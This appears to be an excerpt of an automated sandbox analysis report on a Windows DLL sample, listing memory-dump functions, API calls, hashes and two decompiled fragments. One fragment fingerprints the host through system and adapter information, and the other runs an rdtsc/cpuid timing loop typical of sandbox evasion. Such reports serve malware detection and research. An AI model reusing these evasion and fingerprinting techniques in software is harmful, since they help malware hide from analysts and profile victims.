                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2109273690.000007FEF8FB0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2109287583.000007FEF8FB5000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2109296756.000007FEF8FBE000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2109302082.000007FEF8FC0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                      • API ID: Thread$CreateCurrentDuplicateHandleObjectPriorityResumeSingleWait
                                                                                                                                                                                                                                                                      • String ID: DllRegisterServer$G$_
                                                                                                                                                                                                                                                                      • API String ID: 1174013218-1650116920
                                                                                                                                                                                                                                                                      • Opcode ID: fb96d5351e15185721c7c678f22100d1a9f993aebe460c17edc53ec82f678213
                                                                                                                                                                                                                                                                      • Instruction ID: 3f6dfe96583287e2132e89248d3fe6d141595118fd8055dab05f5fe12df3ddc3
                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: fb96d5351e15185721c7c678f22100d1a9f993aebe460c17edc53ec82f678213
                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 30310772908B868AE7A4CF25F84435AB7E1F7893A4F504039E68C97B78DB3DD1448F40
                                                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                      Function 000007FEF8FB20A0, Relevance: 3.4, APIs: 1, Strings: 1, Instructions: 406memoryCOMMON
                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2109279463.000007FEF8FB1000.00000020.00020000.sdmp, Offset: 000007FEF8FB0000, based on PE: true
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2109273690.000007FEF8FB0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2109287583.000007FEF8FB5000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2109296756.000007FEF8FBE000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2109302082.000007FEF8FC0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                      • API ID: AllocVirtual
                                                                                                                                                                                                                                                                      • String ID: @
                                                                                                                                                                                                                                                                      • API String ID: 4275171209-2766056989
                                                                                                                                                                                                                                                                      • Opcode ID: 81cc5fa61e63df9641c82d5ec4088076d96df196aa3fedfd4a34d15b22035c1b
                                                                                                                                                                                                                                                                      • Instruction ID: 93e7fb77665375a9f577d392b660a0ccbaf77ebf490505a570474afec7383057
                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 81cc5fa61e63df9641c82d5ec4088076d96df196aa3fedfd4a34d15b22035c1b
                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 62326C76609BC58AD7B5CB56F49079AB7A5F789B90F10802AEACC93B18DB3CC154CF01
                                                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                      Function 001B10AC, Relevance: 3.0, APIs: 2, Instructions: 10COMMON
                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2104115614.00000000001B0000.00000040.00000001.sdmp, Offset: 001B0000, based on PE: true
                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                      • API ID: ExitProcessSleepUser
                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                      • API String ID: 354099737-0
                                                                                                                                                                                                                                                                      • Opcode ID: 0042952dd3aad89d8123fb1b19f0e5b4d8c6ab7462fdf89570b08f587bfd53b2
                                                                                                                                                                                                                                                                      • Instruction ID: b248c92643af6e86a2ba2c5abe2b16d8dab0787f217852e1677af44787d65faf
                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 0042952dd3aad89d8123fb1b19f0e5b4d8c6ab7462fdf89570b08f587bfd53b2
                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 03C08C30104684D3F31EBB20E8683E93235B300305F424619E303856E08F3C04C8C303
                                                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                      Function 000007FEF8FB3100, Relevance: 1.7, APIs: 1, Instructions: 216libraryCOMMON
                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2109279463.000007FEF8FB1000.00000020.00020000.sdmp, Offset: 000007FEF8FB0000, based on PE: true
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2109273690.000007FEF8FB0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2109287583.000007FEF8FB5000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2109296756.000007FEF8FBE000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2109302082.000007FEF8FC0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                      • API ID: LibraryLoad
                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                      • API String ID: 1029625771-0
                                                                                                                                                                                                                                                                      • Opcode ID: 71a4d3e6afc3869dd51c089c56fbff1864f24b1d1d871186f2474ca292a1132a
                                                                                                                                                                                                                                                                      • Instruction ID: 9dbeb4177cc0291c960bbfa91b59b6af253aaf81e4de24522d48fd320fe39546
                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 71a4d3e6afc3869dd51c089c56fbff1864f24b1d1d871186f2474ca292a1132a
                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 49D13F76509BC586D764CB59F49039AB7A1F3C9790F10802AEBCD93B68DF79C4948F40
                                                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                      Function 001B2C08, Relevance: 1.6, APIs: 1, Instructions: 65memoryCOMMON
                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                      C-Code - Quality: 44%
                                                                                                                                                                                                                                                                      			E001B2C08(void* __ecx, void* __edx, void* __edi, intOrPtr* __rax, long long __rbx, long long __rsi, long long __rbp, long long __r8, void* __r9, long long _a8, long long _a16, long long _a24) {
				void* _t22;
				int _t23;
				int _t24;
				void* _t30;
				void* _t36;
				intOrPtr* _t40;
				long long _t46;
				signed long long _t47;
				signed long long _t48;
				intOrPtr* _t68;
				long long _t70;

				_t40 = __rax;
				_t36 = __edi;
				_a8 = __rbx;
				_a16 = __rbp;
				_a24 = __rsi;
				_t70 = __r8;
				GetProcessHeap();
				r8d = 0x2001;
				_t22 = RtlAllocateHeap(??, ??, ??); // executed
				_t68 = __rax;
				_t38 = __rax;
				if(__rax != 0) {
					r9d = __ecx;
					_t23 = wsprintfW(??, ??);
					r9d = __edx;
					_t24 = wsprintfW(??, ??);
					r9d = E001B2BD8(_t24, __rax, L"%s%u");
					_t46 = _t23 + _t24 + wsprintfW(??, ??);
					r9d = E001B1678(__rax, _t46, __r8);
					_t47 = _t46 + wsprintfW(??, ??);
					E001B1D18(__rax, _t47, __rax + _t47 * 2, _t70);
					_t48 = _t47 + __rax;
					_t30 = E001B1AC8(_t38, __rax, _t48, __rax + _t48 * 2, ":");
					_t49 = _t48 + __rax;
					E001B2A98(_t30, _t36, __rax, _t48 + __rax, __rax + (_t48 + __rax) * 2, _t70, _t70);
					_t22 = E001B27BC(_t49 + _t40, _t68 + (_t49 + _t40) * 2, _t70, ":");
				}
				return _t22;
			}














                                                                                                                                                                                                                                                                      0x001b2c08
                                                                                                                                                                                                                                                                      0x001b2c08
                                                                                                                                                                                                                                                                      0x001b2c08
                                                                                                                                                                                                                                                                      0x001b2c0d
                                                                                                                                                                                                                                                                      0x001b2c12
                                                                                                                                                                                                                                                                      0x001b2c1c
                                                                                                                                                                                                                                                                      0x001b2c23
                                                                                                                                                                                                                                                                      0x001b2c2e
                                                                                                                                                                                                                                                                      0x001b2c37
                                                                                                                                                                                                                                                                      0x001b2c3d
                                                                                                                                                                                                                                                                      0x001b2c40
                                                                                                                                                                                                                                                                      0x001b2c43
                                                                                                                                                                                                                                                                      0x001b2c49
                                                                                                                                                                                                                                                                      0x001b2c5d
                                                                                                                                                                                                                                                                      0x001b2c66
                                                                                                                                                                                                                                                                      0x001b2c7e
                                                                                                                                                                                                                                                                      0x001b2c93
                                                                                                                                                                                                                                                                      0x001b2ca9
                                                                                                                                                                                                                                                                      0x001b2cb5
                                                                                                                                                                                                                                                                      0x001b2ccb
                                                                                                                                                                                                                                                                      0x001b2cd2
                                                                                                                                                                                                                                                                      0x001b2cd7
                                                                                                                                                                                                                                                                      0x001b2cde
                                                                                                                                                                                                                                                                      0x001b2ce3
                                                                                                                                                                                                                                                                      0x001b2ced
                                                                                                                                                                                                                                                                      0x001b2cf9
                                                                                                                                                                                                                                                                      0x001b2cfe
                                                                                                                                                                                                                                                                      0x001b2d15

                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                      • RtlAllocateHeap.NTDLL(?,?,00000003,001B24A4), ref: 001B2C37
                                                                                                                                                                                                                                                                        • Part of subcall function 001B1678: NtQuerySystemInformation.NTDLL(?,?,00000000,001B2CB1,?,?,00000003,001B24A4), ref: 001B16CB
                                                                                                                                                                                                                                                                        • Part of subcall function 001B27BC: GetAdaptersInfo.IPHLPAPI(?,?,00000000,001B2CFE,?,?,00000003,001B24A4), ref: 001B280F
                                                                                                                                                                                                                                                                        • Part of subcall function 001B27BC: GetAdaptersInfo.IPHLPAPI(?,?,00000000,001B2CFE,?,?,00000003,001B24A4), ref: 001B2845
                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2104115614.00000000001B0000.00000040.00000001.sdmp, Offset: 001B0000, based on PE: true
                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                      • API ID: AdaptersInfo$AllocateHeapInformationQuerySystem
                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                      • API String ID: 1716770124-0
                                                                                                                                                                                                                                                                      • Opcode ID: 551f92eabf4abe2fe4f6e692089831cc0b5c0ff75ee8c8a7613f42fc3d82b9ba
                                                                                                                                                                                                                                                                      • Instruction ID: 79a8e36b197c05e4bfbffd8a43a072400a9706c1595671512c0785f21630dd0c
                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 551f92eabf4abe2fe4f6e692089831cc0b5c0ff75ee8c8a7613f42fc3d82b9ba
                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: BB213972785B00A2DF10AB55F8943E87360FBA5B81F94852AEB0E87775EF38C569C300
                                                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                      Function 001B260C, Relevance: 1.5, APIs: 1, Instructions: 22COMMON
                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                      • GetNativeSystemInfo.KERNEL32(?,?,?,?,?,?,?,?,0000011C,001B1E13), ref: 001B264B
                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2104115614.00000000001B0000.00000040.00000001.sdmp, Offset: 001B0000, based on PE: true
                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                      • API ID: InfoNativeSystem
                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                      • API String ID: 1721193555-0
                                                                                                                                                                                                                                                                      • Opcode ID: e07d5386416b452ae357def83d54998eea7d12d9b96eaf79d3048644093a814a
                                                                                                                                                                                                                                                                      • Instruction ID: 62c8b849bfd568ce1ef31c80dc291a9cddc16c83e20172e320ba1ef74a26f57a
                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: e07d5386416b452ae357def83d54998eea7d12d9b96eaf79d3048644093a814a
                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 3EE0ED3262454592EF11FB20E8543D97361FBD8704F844126A95E426A4EF3CCA5DC740
                                                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                      Function 001B1000, Relevance: 1.5, APIs: 1, Instructions: 13threadCOMMON
                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2104115614.00000000001B0000.00000040.00000001.sdmp, Offset: 001B0000, based on PE: true
                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                      • API ID: CreateThread
                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                      • API String ID: 2422867632-0
                                                                                                                                                                                                                                                                      • Opcode ID: d810e3ef372af79f05ccbcc8a3c3fc3137e58aa0d92ff2561a569d39733649b8
                                                                                                                                                                                                                                                                      • Instruction ID: 8f3362570e4ab31714775b751fca0485858bf91516d18a81d9f787fbf53f0960
                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: d810e3ef372af79f05ccbcc8a3c3fc3137e58aa0d92ff2561a569d39733649b8
                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 62D0A772E1424083F7309B10EA263DA3311F3D4315FD18206D54944554CF3CC158CA00
                                                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                      Non-executed Functions

                                                                                                                                                                                                                                                                      Function 000007FEF8FB15D0, Relevance: 1.7, Strings: 1, Instructions: 430COMMON
                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2109279463.000007FEF8FB1000.00000020.00020000.sdmp, Offset: 000007FEF8FB0000, based on PE: true
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2109273690.000007FEF8FB0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2109287583.000007FEF8FB5000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2109296756.000007FEF8FBE000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2109302082.000007FEF8FC0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                                                      • String ID: %
                                                                                                                                                                                                                                                                      • API String ID: 0-2567322570
                                                                                                                                                                                                                                                                      • Opcode ID: 4c9ee2add8f40c47592069122d8a0d8c3d159a18c784029c3ab9a24ce0be2f6a
                                                                                                                                                                                                                                                                      • Instruction ID: ab3488ce0eceea3ee0bc7ce3bd4693e277bc5914e51a9d1bbe048e8b25635434
                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 4c9ee2add8f40c47592069122d8a0d8c3d159a18c784029c3ab9a24ce0be2f6a
                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 0E42A0B6A0C7D58AD7B08F15E0503ABBBE1F789744F10512AEAC986B59EB3CC480DF11
                                                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                      Function 000007FEF8FB41BF, Relevance: .2, Instructions: 238COMMON
                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2109279463.000007FEF8FB1000.00000020.00020000.sdmp, Offset: 000007FEF8FB0000, based on PE: true
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2109273690.000007FEF8FB0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2109287583.000007FEF8FB5000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2109296756.000007FEF8FBE000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2109302082.000007FEF8FC0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                                                      • Opcode ID: 18e12339979919f4a0dc9a07f2e75115fd9bef9f15be47883a766d79ea54979f
                                                                                                                                                                                                                                                                      • Instruction ID: eaee352713882f45d60a20d6ad9de963d35200938772eb6fe9546e390b03a86b
                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 18e12339979919f4a0dc9a07f2e75115fd9bef9f15be47883a766d79ea54979f
                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 4AC1A977A18BC586D760CF1AE44179ABBA4F3987D0F00852AEA9D83B69DB7CC450CF50
                                                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                      Function 001B1E50, Relevance: .0, Instructions: 47COMMON
                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                      C-Code - Quality: 74%
                                                                                                                                                                                                                                                                      			E001B1E50(intOrPtr __ebx, intOrPtr __edx, signed long long __rax, long long __rbx, signed long long __rdx, signed long long __rsi) {
				signed int _t18;
				signed long long _t31;
				signed long long _t34;
				signed long long _t41;
				signed long long _t42;
				signed long long _t43;
				signed long long _t44;
				void* _t45;
				signed long long _t47;
				long long _t49;
				void* _t51;
				void* _t52;

				_t47 = __rsi;
				_t41 = __rdx;
				_t31 = __rax;
				 *((long long*)(_t51 + 8)) = __rbx;
				 *((long long*)(_t51 + 0x10)) = _t49;
				 *((long long*)(_t51 + 0x18)) = __rsi;
				_push(_t45);
				_t52 = _t51 - 0x30;
				do {
					SwitchToThread();
					asm("rdtsc");
					_t42 = _t41 << 0x20;
					asm("cpuid");
					 *((intOrPtr*)(_t52 + 0x20)) = 1;
					 *((intOrPtr*)(_t52 + 0x24)) = __ebx;
					 *((intOrPtr*)(_t52 + 0x28)) = 0;
					 *((intOrPtr*)(_t52 + 0x2c)) = __edx;
					asm("rdtsc");
					_t43 = _t42 << 0x20;
					_t34 = (_t31 | _t42 | _t43) - (_t31 | _t42);
					_t45 = _t45 + _t34;
					_t18 = SwitchToThread();
					asm("rdtsc");
					_t44 = _t43 << 0x20;
					asm("rdtsc");
					_t41 = _t44 << 0x20;
					_t31 = (_t34 | _t44 | _t41) - (_t34 | _t44);
					_t47 = _t47 + _t31;
					_t49 = _t49 - 1;
				} while (_t49 != 0);
				return _t18 / _t47;
			}















                                                                                                                                                                                                                                                                      0x001b1e50
                                                                                                                                                                                                                                                                      0x001b1e50
                                                                                                                                                                                                                                                                      0x001b1e50
                                                                                                                                                                                                                                                                      0x001b1e50
                                                                                                                                                                                                                                                                      0x001b1e55
                                                                                                                                                                                                                                                                      0x001b1e5a
                                                                                                                                                                                                                                                                      0x001b1e5f
                                                                                                                                                                                                                                                                      0x001b1e60
                                                                                                                                                                                                                                                                      0x001b1e6b
                                                                                                                                                                                                                                                                      0x001b1e6b
                                                                                                                                                                                                                                                                      0x001b1e71
                                                                                                                                                                                                                                                                      0x001b1e73
                                                                                                                                                                                                                                                                      0x001b1e84
                                                                                                                                                                                                                                                                      0x001b1e86
                                                                                                                                                                                                                                                                      0x001b1e8a
                                                                                                                                                                                                                                                                      0x001b1e8e
                                                                                                                                                                                                                                                                      0x001b1e92
                                                                                                                                                                                                                                                                      0x001b1e96
                                                                                                                                                                                                                                                                      0x001b1e98
                                                                                                                                                                                                                                                                      0x001b1e9f
                                                                                                                                                                                                                                                                      0x001b1ea2
                                                                                                                                                                                                                                                                      0x001b1ea5
                                                                                                                                                                                                                                                                      0x001b1eab
                                                                                                                                                                                                                                                                      0x001b1ead
                                                                                                                                                                                                                                                                      0x001b1eb8
                                                                                                                                                                                                                                                                      0x001b1eba
                                                                                                                                                                                                                                                                      0x001b1ec1
                                                                                                                                                                                                                                                                      0x001b1ec4
                                                                                                                                                                                                                                                                      0x001b1ec7
                                                                                                                                                                                                                                                                      0x001b1ec7
                                                                                                                                                                                                                                                                      0x001b1ee9

                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2104115614.00000000001B0000.00000040.00000001.sdmp, Offset: 001B0000, based on PE: true
                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                                                      • Opcode ID: 2318fb796138583acd0950f01f63cac7e4af46243d00b3ebc09f9ecd2c5c3d1b
                                                                                                                                                                                                                                                                      • Instruction ID: 80c998a9793ecc47e81bc9254404e8b3672f87213e98f697ae28350c03febed1
                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 2318fb796138583acd0950f01f63cac7e4af46243d00b3ebc09f9ecd2c5c3d1b
                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 60019E72B28A908BDF248F26B600389B6A2E38D7C0F148535EB9C43B19DB3CD4958B04
                                                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                                                      Uniqueness Score: -1.00%